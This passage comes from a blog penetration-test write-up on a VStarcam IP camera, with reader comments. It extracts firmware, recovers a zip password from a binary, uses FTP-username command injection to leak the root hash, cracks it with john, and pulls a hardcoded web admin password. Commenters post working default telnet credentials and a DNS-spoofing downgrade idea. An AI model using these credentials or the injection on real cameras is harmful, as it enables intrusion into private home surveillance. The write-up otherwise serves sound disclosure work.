uncompressed size: 4369, name: "www/jquery/images/ui-icons_222222_256x240.png" 341017 0x53419 Zip encrypted archive data, at least v2.0 to extract, compressed size: 5179, uncompressed size: 5355, name: "www/jquery/images/ui-icons_228ef1_256x240.png" 346287 0x548AF Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_2e83ff_256x240.png" 350529 0x55941 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_454545_256x240.png" 354771 0x569D3 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_888888_256x240.png" 359013 0x57A65 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_cd0a0a_256x240.png" 363255 0x58AF7 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_ef8c08_256x240.png" 367497 0x59B89 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152, uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffd27a_256x240.png" 371740 0x5AC1C Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151, uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffffff_256x240.png" 375982 0x5BCAE Zip encrypted archive data, at least v2.0 to extract, compressed size: 4206, uncompressed size: 22938, name: "www/jquery/jquery-ui-1.8.18.custom.css" 380272 0x5CD70 Zip encrypted archive data, at least v2.0 to extract, compressed size: 7539, uncompressed size: 27218, name: "www/jquery/jquery-ui-1.8.18.custom.min.js" 387898 0x5EB3A Zip encrypted archive data, at least v2.0 to extract, compressed size: 33625, uncompressed size: 94843, name: "www/jquery/jquery.min.js" 421593 0x66ED9 Zip encrypted archive data, at least v2.0 to extract, compressed size: 7855, uncompressed size: 31770, name: "www/jquery/meioMask.js" 429516 0x68DCC Zip encrypted archive data, at least v2.0 to extract, compressed size: 132400, uncompressed size: 149040, name: "www/linkfail.wav" 561978 0x8933A Zip encrypted archive data, at least v2.0 to extract, compressed size: 81259, uncompressed size: 92720, name: "www/linking.wav" 643298 0x9D0E2 Zip encrypted archive data, at least v2.0 to extract, compressed size: 88942, uncompressed size: 97664, name: "www/linksuccess.wav" 732305 0xB2C91 Zip encrypted archive data, at least v2.0 to extract, compressed size: 783, uncompressed size: 1581, name: "www/live.htm" 733146 0xB2FDA Zip encrypted archive data, at least v2.0 to extract, compressed size: 795, uncompressed size: 1719, name: "www/log.htm" 733998 0xB332E Zip encrypted archive data, at least v2.0 to extract, compressed size: 1830, uncompressed size: 7813, name: "www/login.htm" 735887 0xB3A8F Zip encrypted archive data, at least v2.0 to extract, compressed size: 42, uncompressed size: 31, name: "www/logo.js" 735986 0xB3AF2 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1857, uncompressed size: 7447, name: "www/mail.htm" 737901 0xB426D Zip encrypted archive data, at least v2.0 to extract, compressed size: 69, uncompressed size: 69, name: "www/mime.types" 738030 0xB42EE Zip encrypted archive data, at least v2.0 to extract, compressed size: 31123, uncompressed size: 34856, name: "www/mls.wav" 769210 0xBBCBA Zip encrypted archive data, at least v2.0 to extract, compressed size: 11055, uncompressed size: 64215, name: "www/monitor.htm" 780326 0xBE826 Zip encrypted archive data, at least v2.0 to extract, compressed size: 7280, uncompressed size: 42747, name: "www/monitor2.htm" 787668 0xC04D4 Zip encrypted archive data, at least v2.0 to extract, compressed size: 3964, uncompressed size: 30410, name: "www/multidev.htm" 791694 0xC148E Zip encrypted archive data, at least v2.0 to extract, compressed size: 3559, uncompressed size: 28945, name: "www/multidev2.htm" 795316 0xC22B4 Zip encrypted archive data, at least v2.0 to extract, compressed size: 102, uncompressed size: 127, name: "www/oem.js" 795474 0xC2352 Zip encrypted archive data, at least v1.0 to extract, compressed size: 20, uncompressed size: 8, name: "www/oem.txt" 795551 0xC239F Zip encrypted archive data, at least v2.0 to extract, compressed size: 1200, uncompressed size: 3859, name: "www/pda.htm" 796808 0xC2888 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1290, uncompressed size: 4992, name: "www/ptz.htm" 798155 0xC2DCB Zip encrypted archive data, at least v2.0 to extract, compressed size: 1077, uncompressed size: 3336, name: "www/public.js" 799291 0xC323B Zip encrypted archive data, at least v2.0 to extract, compressed size: 535, uncompressed size: 1138, name: "www/reboot.htm" 799886 0xC348E Zip encrypted archive data, at least v2.0 to extract, compressed size: 337, uncompressed size: 535, name: "www/rebootme.htm" 800285 0xC361D Zip encrypted archive data, at least v2.0 to extract, compressed size: 1216, uncompressed size: 4169, name: "www/recordpath.htm" 801565 0xC3B1D Zip encrypted archive data, at least v2.0 to extract, compressed size: 2760, uncompressed size: 9013, name: "www/recordplay.htm" 804389 0xC4625 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1961, uncompressed size: 6499, name: "www/recordplay2.htm" 806415 0xC4E0F Zip encrypted archive data, at least v2.0 to extract, compressed size: 3288, uncompressed size: 13366, name: "www/recordsch.htm" 809766 0xC5B26 Zip encrypted archive data, at least v2.0 to extract, compressed size: 105533, uncompressed size: 118284, name: "www/resetok.wav" 915360 0xDF7A0 Zip encrypted archive data, at least v2.0 to extract, compressed size: 285, uncompressed size: 427, name: "www/rowscolor.js" 915707 0xDF8FB Zip encrypted archive data, at least v1.0 to extract, compressed size: 188, uncompressed size: 176, name: "www/sensordata.bin" 915959 0xDF9F7 Zip encrypted archive data, at least v2.0 to extract, compressed size: 927, uncompressed size: 2794, name: "www/setddns.htm" 916947 0xDFDD3 Zip encrypted archive data, at least v2.0 to extract, compressed size: 781, uncompressed size: 2340, name: "www/setstep.htm" 917789 0xE011D Zip encrypted archive data, at least v2.0 to extract, compressed size: 997, uncompressed size: 2217, name: "www/setuid.htm" 918846 0xE053E Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/simple_chinese/" 918923 0xE058B Zip encrypted archive data, at least v2.0 to extract, compressed size: 225, uncompressed size: 461, name: "www/simple_chinese/oem.js" 919219 0xE06B3 Zip encrypted archive data, at least v2.0 to extract, compressed size: 11293, uncompressed size: 31404, name: "www/simple_chinese/string.js" 930586 0xE331A Zip encrypted archive data, at least v2.0 to extract, compressed size: 389, uncompressed size: 719, name: "www/snapshot.htm" 931037 0xE34DD Zip encrypted archive data, at least v2.0 to extract, compressed size: 27, uncompressed size: 32, name: "www/sotfLimitParam.ini" 931132 0xE353C Zip encrypted archive data, at least v2.0 to extract, compressed size: 1499, uncompressed size: 5753, name: "www/status.htm" 932691 0xE3B53 Zip encrypted archive data, at least v2.0 to extract, compressed size: 892, uncompressed size: 4302, name: "www/style.css" 933642 0xE3F0A Zip encrypted archive data, at least v1.0 to extract, compressed size: 14, uncompressed size: 2, name: "www/test.txt" 933714 0xE3F52 Zip encrypted archive data, at least v2.0 to extract, compressed size: 516, uncompressed size: 1441, name: "www/test_ftp.htm" 934292 0xE4194 Zip encrypted archive data, at least v2.0 to extract, compressed size: 524, uncompressed size: 1462, name: "www/test_mail.htm" 934879 0xE43DF Zip encrypted archive data, at least v2.0 to extract, compressed size: 145, uncompressed size: 188, name: "www/unauth.htm" 935084 0xE44AC Zip encrypted archive data, at least v2.0 to extract, compressed size: 826, uncompressed size: 2513, name: "www/upgrade.htm" 935971 0xE4823 Zip encrypted archive data, at least v2.0 to extract, compressed size: 841, uncompressed size: 2009, name: "www/upnp.htm" 936870 0xE4BA6 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1355, uncompressed size: 5074, name: "www/user.htm" 938283 0xE512B Zip encrypted archive data, at least v2.0 to extract, compressed size: 92024, uncompressed size: 102860, name: "www/vfaile.wav" 1030367 0xFB8DF Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/video.cab" 1030438 0xFB926 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/video.exe" 1030509 0xFB96D Zip encrypted archive data, at least v2.0 to extract, compressed size: 1504, uncompressed size: 8824, name: "www/video.htm" 1032072 0xFBF88 Zip encrypted archive data, at least v2.0 to extract, compressed size: 92722, uncompressed size: 103604, name: "www/vwificonfig.wav" 1124859 0x1129FB Zip encrypted archive data, at least v2.0 to extract, compressed size: 94398, uncompressed size: 102768, name: "www/wificonfig.wav" 1219321 0x129AF9 Zip encrypted archive data, at least v2.0 to extract, compressed size: 2748, uncompressed size: 11609, name: "www/wireless.htm" 1235916 0x12DBCC End of Zip archive |
The zip files are password protected.
Another way to check :
|
1 2 3 4 5 |
> unzip CH-app-EN53.8.1.13_VSTARCAM.bin Archive: CH-app-EN53.8.1.13_VSTARCAM.bin warning [CH-app-EN53.8.1.13_VSTARCAM.bin]: 36 extra bytes at beginning or within zipfile (attempting to process anyway) [CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password: |
The easiest way is to go back to the firmware folder and look for the unzipping password :
|
1 |
> cd ../firmware/_CH-sys-48.53.64.67.bin.extracted/ |
And use the same method that we used to find the root password. Look for any unzip command in files :
|
1 2 3 4 |
> grep -r "unzip" . Binary file ./system/system/bin/updata matches Binary file ./system/system/bin/wifidaemon matches Binary file ./system/system/bin/encoder matches |
And check in the updata file for the password :
|
1 2 3 4 5 6 |
> strings system/system/bin/updata | grep -A 1 -B 1 unzip cp /tmp/network-b.ini /system/www/network-b.ini unzip www is start... /system/system/bin/unzip1 -o -P vstarcam!@#$% /tmp/www.zip -d /system > /tmp/app.txt unzip www is end rm /tmp/www.zip |
Unzipping password : vstarcam!@#$% (better than 123456 by the way !).
Let’s go back to WebUI unzipping :
|
1 |
cd ../../webui/ |
And use the previous password to unzip the file :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 |
> unzip CH-app-EN53.8.1.13_VSTARCAM.bin Archive: CH-app-EN53.8.1.13_VSTARCAM.bin warning [CH-app-EN53.8.1.13_VSTARCAM.bin]: 36 extra bytes at beginning or within zipfile (attempting to process anyway) [CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password: creating: www/ inflating: www/admin.htm inflating: www/admin2.htm inflating: www/alarm.htm inflating: www/alarm.pcm inflating: www/alias.htm inflating: www/ap.htm extracting: www/appver.js inflating: www/audio.htm inflating: www/audioparam.bin inflating: www/datetime.htm inflating: www/ddns.htm inflating: www/dns.htm creating: www/english/ inflating: www/english/oem.js inflating: www/english/string.js inflating: www/ftp.htm inflating: www/functions.htm creating: www/images/ extracting: www/images/2_10.gif inflating: www/images/2_11.gif inflating: www/images/2_13.gif extracting: www/images/2_16.gif extracting: www/images/2_17.gif inflating: www/images/2_19.gif extracting: www/images/2_20.gif extracting: www/images/2_27.gif inflating: www/images/2_item.gif inflating: www/images/333.gif inflating: www/images/alarm.gif inflating: www/images/alarm.wav inflating: www/images/alert.gif inflating: www/images/autopos.gif extracting: www/images/back.gif inflating: www/images/bg.png inflating: www/images/bg_right.jpg inflating: www/images/btn_circle.gif inflating: www/images/btn_jianting.gif inflating: www/images/btn_jianting_on.gif inflating: www/images/btn_luxiang.gif inflating: www/images/btn_luxiang_on.gif extracting: www/images/btn_paizhao.gif extracting: www/images/btn_shezhi.gif inflating: www/images/btn_talk.gif inflating: www/images/btn_talk_on.gif extracting: www/images/CD.gif extracting: www/images/client.gif inflating: www/images/clr_bright.gif inflating: www/images/clr_contast.gif inflating: www/images/clr_hue.gif inflating: www/images/clr_saturation.gif inflating: www/images/del.gif inflating: www/images/download.gif inflating: www/images/elogo.gif extracting: www/images/firefox.gif inflating: www/images/green.gif inflating: www/images/hpatrol.gif extracting: www/images/hpatrol_down.gif inflating: www/images/hpatrol_up.gif extracting: www/images/IE.gif inflating: www/images/index_bg.gif extracting: www/images/iphone.gif inflating: www/images/ir0.gif inflating: www/images/ir1.gif inflating: www/images/line.gif inflating: www/images/logo.gif inflating: www/images/logo1.gif extracting: www/images/logo2.gif inflating: www/images/mirror.gif inflating: www/images/mirror_on.gif extracting: www/images/modellogo.gif inflating: www/images/nav-1.gif inflating: www/images/nav.gif inflating: www/images/network.gif inflating: www/images/no.gif inflating: www/images/ok.gif inflating: www/images/option.gif extracting: www/images/osd01.gif extracting: www/images/osd02.gif inflating: www/images/p.gif extracting: www/images/pan_1.gif extracting: www/images/pan_2.gif extracting: www/images/pan_3.gif extracting: www/images/pan_4.gif extracting: www/images/phone.gif extracting: www/images/playback.gif inflating: www/images/ptz_19.gif inflating: www/images/ptz_24.gif inflating: www/images/ptz_26.gif inflating: www/images/ptz_29.gif inflating: www/images/ptz_34.gif inflating: www/images/pt_speed.gif extracting: www/images/rec.gif inflating: www/images/record.gif inflating: www/images/red.gif inflating: www/images/reversal.gif inflating: www/images/reversal_on.gif extracting: www/images/signal0.png extracting: www/images/signal1.png extracting: www/images/signal2.png extracting: www/images/signal3.png extracting: www/images/signal4.png extracting: www/images/signal5.png inflating: www/images/space.gif inflating: www/images/switchoff_up.gif inflating: www/images/switchon_up.gif inflating: www/images/vpatrol.gif inflating: www/images/vpatrol_down.gif inflating: www/images/vpatrol_up.gif inflating: www/images/x1_off.gif inflating: www/images/x1_on.gif inflating: www/images/x4_off.gif inflating: www/images/x4_on.gif extracting: www/images/x9_off.gif inflating: www/images/x9_on.gif inflating: www/index.htm inflating: www/ip.htm inflating: www/iphone.htm creating: www/jquery/ creating: www/jquery/images/ inflating: www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png extracting: www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png inflating: www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png inflating: www/jquery/images/ui-bg_flat_10_000000_40x100.png inflating: www/jquery/images/ui-bg_flat_75_ffffff_40x100.png inflating: www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png inflating: www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png inflating: www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png inflating: www/jquery/images/ui-bg_glass_65_ffffff_1x400.png inflating: www/jquery/images/ui-bg_glass_75_dadada_1x400.png inflating: www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png inflating: www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png inflating: www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png inflating: www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png inflating: www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png inflating: www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png inflating: www/jquery/images/ui-icons_222222_256x240.png inflating: www/jquery/images/ui-icons_228ef1_256x240.png inflating: www/jquery/images/ui-icons_2e83ff_256x240.png inflating: www/jquery/images/ui-icons_454545_256x240.png inflating: www/jquery/images/ui-icons_888888_256x240.png inflating: www/jquery/images/ui-icons_cd0a0a_256x240.png inflating: www/jquery/images/ui-icons_ef8c08_256x240.png inflating: www/jquery/images/ui-icons_ffd27a_256x240.png inflating: www/jquery/images/ui-icons_ffffff_256x240.png inflating: www/jquery/jquery-ui-1.8.18.custom.css inflating: www/jquery/jquery-ui-1.8.18.custom.min.js inflating: www/jquery/jquery.min.js inflating: www/jquery/meioMask.js inflating: www/linkfail.wav inflating: www/linking.wav inflating: www/linksuccess.wav inflating: www/live.htm inflating: www/log.htm inflating: www/login.htm inflating: www/logo.js inflating: www/mail.htm inflating: www/mime.types inflating: www/mls.wav inflating: www/monitor.htm inflating: www/monitor2.htm inflating: www/multidev.htm inflating: www/multidev2.htm inflating: www/oem.js extracting: www/oem.txt inflating: www/pda.htm inflating: www/ptz.htm inflating: www/public.js inflating: www/reboot.htm inflating: www/rebootme.htm inflating: www/recordpath.htm inflating: www/recordplay.htm inflating: www/recordplay2.htm inflating: www/recordsch.htm inflating: www/resetok.wav inflating: www/rowscolor.js extracting: www/sensordata.bin inflating: www/setddns.htm inflating: www/setstep.htm inflating: www/setuid.htm creating: www/simple_chinese/ inflating: www/simple_chinese/oem.js inflating: www/simple_chinese/string.js inflating: www/snapshot.htm inflating: www/sotfLimitParam.ini inflating: www/status.htm inflating: www/style.css extracting: www/test.txt inflating: www/test_ftp.htm inflating: www/test_mail.htm inflating: www/unauth.htm inflating: www/upgrade.htm inflating: www/upnp.htm inflating: www/user.htm inflating: www/vfaile.wav extracting: www/video.cab extracting: www/video.exe inflating: www/video.htm inflating: www/vwificonfig.wav inflating: www/wificonfig.wav inflating: www/wireless.htm |
Done !
4.3 Method 3 : Injection
Thanks to this article, we know that the system is interpreting the FTP user, so proceed as follow :
Save and proceed to a “test”. Then monitor the FTP server logs :
|
1 2 3 |
FTP session opened. USER root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh: no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21 2FTP session closed. |
So the hashed password for root user is : LSiuY7pOmZG2s. As already mentioned before, easy to decode :
|
1 2 3 4 5 6 |
> echo "root:LSiuY7pOmZG2s" > password.txt > john password.txt Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16]) 123456 (root) guesses: 1 time: 0:00:00:00 100% (2) c/s: 17680 trying: 12345 - biteme Use the "--show" option to display all of the cracked passwords reliably |
5. Web interface penetration test
Initiate a telnet connection on the camera using the credentials found earlier.
Then it’s easy to find the web interface password :
|
1 2 3 4 5 6 7 |
> find -name "*.cgi" ./system/param/login.cgi > strings system/param/login.cgi | grep -A 1 -B 1 pass var loginuser="admin"; var loginpass="erocgfhruehgi3ureozkfx"; var pri=255; |
6. Links
– http://catdevzero.blogspot.sg/2015/02/experiments-with-ip-camera-part-1.html
– http://liken.otsoa.net/blog/?x=entry:entry140322-183809
– http://jumpespjump.blogspot.co.uk/2015/09/how-i-hacked-my-ip-camera-and-found.html
– https://www.pentestpartners.com/blog/hacking-the-ip-camera-part-1/
Very nice, on my camera the password is a empty string.
There is a interesting line.
It would appear that the password is generated randomly by a program or function call CreateTelnetPasswd.
How would you recommend getting telnet access?
===websLaunchCgiProc===
/etc/passwd
vstarcam2015:%s:0:0:Administrator:/:/bin/sh
/etc/group
root:x:0:admin
CreateTelnetPasswd
WebReadParam
/
…skipping
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
Never mind my last post, the FTP thing worked. The password might take a while to crack tho.
I wish these camera were Open-Source, they could probably sell more units if they did that.
BTW , for any one else reading this the password was 20150602 for firmware 48.53.72.74. The username was vstarcam2015
Thanks for the great article on reverse engineering.
Thank you very much. vstarcam2015/20150602 worked for me.
yep worked for me. vstarcam2015:QwXG/I3Tws752
the telent password for my
VSTARCAM T6835WIP PnP IP Network Camera
was 2011vsta
Cheers SilverBird and OP. Im in 🙂
Hi guys,
Great article, I learned a lot from it.
I have this cam and I want to use it in a secure way. When I disable traffic to internet for this device on my router and reboot the cam, I can’t connect anymore via the Android application (eye4). Even telnet and nmap don’t show life.
I tried to find another application that could connect internally but none of them succeeds to show any frame.
Someone kowns about some good app?
10x
Daniel
Daniel,
I would not be surprised that the Eye4 app is not working anymore after that.
However it is unlikely that telnet and HTTP no longer work. Did you try to ping the cam ?
If NMAP is not showing up anything, any client will be able to connect.
really interesting. thanks very much for this “howto”. i am asking myself how you figured out the right firmware-file from
Remote file : http://45.63.8.70/FM/system/firmware.txt
there are so many. i have the CAM C7837W. what firmware-file do i need?
thanks in advance
torsten
Hi,
Unfortunately I don’t have the camera anymore but if I remember correctly, this should be mentioned somewhere on the Web UI (maintenance, system or something similar).
Ronan
Very interesting article, I was going to buy this camera as baby monitor.
Just a couple of questions: would be a little less insecure changing the root password to something a bit harder to brute-force than 123456?
Furthermore what if I don’t forward the telnet and ftp port?
Thanks!
Not really, it’s reseted when the camera boots up, and for me the biggest issue is to have a videostream going on unknown servers…
But having this camera running on a local network without internet connection should be ok…
It seems they have addressed the security vulnerabilities. Today I updated the firmware and NMAP didn’t show any open ports…
Hi,
Good to know ! Maybe they didn’t fix the injection breach, and there is still a way to activate Telnet by this way.
Ronan
you can easily spoof the dns for the update request wherby pointing it to an ip holding older firmware, I have successfully got telnet working however the web interface has been removed it seems.